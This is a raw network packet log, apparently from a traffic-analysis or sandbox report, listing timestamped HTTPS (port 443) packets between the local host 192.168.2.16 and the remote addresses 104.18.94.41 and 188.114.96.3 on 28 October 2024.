                                                                                                                                                Oct 28, 2024 17:49:18.993299961 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.993319035 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.993374109 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.993388891 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.993966103 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.993993044 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.994029045 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.994044065 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.994112015 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.994744062 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.994826078 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.994853973 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.994882107 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.994896889 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.994951963 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.995651960 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.995718002 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.995773077 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.995786905 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.996427059 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.996455908 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.996486902 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.996501923 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.996568918 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.017589092 CET44349799104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.017806053 CET44349799104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.017901897 CET49799443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.018425941 CET49799443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.018450975 CET44349799104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.109947920 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.110002995 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.110028982 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.110063076 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.110078096 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.110116959 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.110146046 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.110414028 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.110434055 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.110477924 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.110482931 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.110498905 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.110533953 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.111246109 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.111282110 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.111301899 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.111335039 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.111401081 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.112169027 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.112241983 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.112996101 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.113074064 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.113087893 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.157659054 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.157784939 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.157804966 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.157872915 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.226890087 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.226932049 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.226969957 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.226989031 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.227020979 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.227042913 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.227308035 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.227350950 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.227375984 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.227390051 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.227422953 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.227461100 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.227951050 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.228005886 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.228022099 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.228034019 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.228060007 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.228096008 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.228848934 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.228916883 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.274247885 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.274312973 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.274343014 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.274369955 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.274396896 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.324789047 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.344377995 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.344386101 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.344423056 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.344465017 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.344482899 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.344511032 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.344548941 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.344742060 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.344815969 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.344830990 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.344854116 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.344891071 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.344903946 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.344954967 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.344958067 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.345010042 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.345047951 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.345077038 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.347779036 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.347806931 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.347896099 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.348151922 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.348166943 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.364347935 CET49791443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:19.411338091 CET44349791188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.496167898 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.496223927 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.496314049 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.496643066 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.496656895 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.961532116 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.961997032 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.962012053 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.962311983 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.962620974 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:19.962707043 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:19.962778091 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.003354073 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.112557888 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.112607002 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.112637997 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.112668037 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.112689018 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.112709045 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.112739086 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.113162041 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.113209963 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.113233089 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.113240004 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.113270998 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.113290071 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.113295078 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.113337040 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.133781910 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.134051085 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.134079933 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.135143042 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.135452986 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.135519028 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.135607004 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.135654926 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.135680914 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.229418993 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.229598045 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.229660988 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.229675055 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.229775906 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.229819059 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.229825020 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.230365992 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.230427980 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.230432987 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.230844975 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.230901957 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.230906963 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.231029987 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.231085062 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.231089115 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.231739998 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.231828928 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.231831074 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.231856108 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.231913090 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.231951952 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.232105017 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.232158899 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.232165098 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.232685089 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.232742071 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.232745886 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.234673977 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.234755993 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.234761000 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.282741070 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.346344948 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.346553087 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.346637964 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.346638918 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.346666098 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.346754074 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.346769094 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.346919060 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.346973896 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.346980095 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.347311020 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.347393990 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.347398996 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.347476959 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.347533941 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.347538948 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.348006010 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.348078966 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.348083973 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.348108053 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.348141909 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.348885059 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.348954916 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.348959923 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.393786907 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.397412062 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.397466898 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.397502899 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.397541046 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.397542953 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.397567987 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.397595882 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.397615910 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.397655010 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.397661924 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.397666931 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.397717953 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.397722960 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.441767931 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.441781998 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.471007109 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.471121073 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.471128941 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.471154928 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.471190929 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.471219063 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.471276045 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.471342087 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.471394062 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.471450090 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.471491098 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.471546888 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.471585989 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.471652031 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.471682072 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.471739054 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.476371050 CET44349791188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.476454973 CET44349791188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.476512909 CET49791443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:20.477168083 CET49791443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:20.477185011 CET44349791188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.488773108 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.508440018 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.508526087 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.508559942 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.508614063 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.519021988 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.519108057 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.519146919 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.519176960 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.519184113 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.519196987 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.519232035 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.519531012 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.519587040 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.519593954 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.519891977 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.519943953 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.519948959 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.520427942 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.520462036 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.520478964 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.520483971 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.520523071 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.520533085 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.521737099 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.521773100 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.521794081 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.521797895 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.521840096 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.521919012 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.522049904 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.522088051 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.522093058 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.522097111 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.522135019 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.522139072 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.566742897 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.580878973 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.580982924 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.581630945 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.581696987 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.581728935 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.581792116 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.581860065 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.581908941 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.581919909 CET44349800104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.581964016 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.582012892 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.582037926 CET49800443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.640328884 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.640412092 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.640455008 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.640487909 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.640491009 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.640512943 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.640537977 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.640563965 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.640594959 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.640607119 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.640613079 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.640650988 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.640655994 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.641275883 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.641329050 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.641333103 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.641357899 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.641386986 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.641411066 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.641415119 CET44349801104.18.94.41192.168.2.16
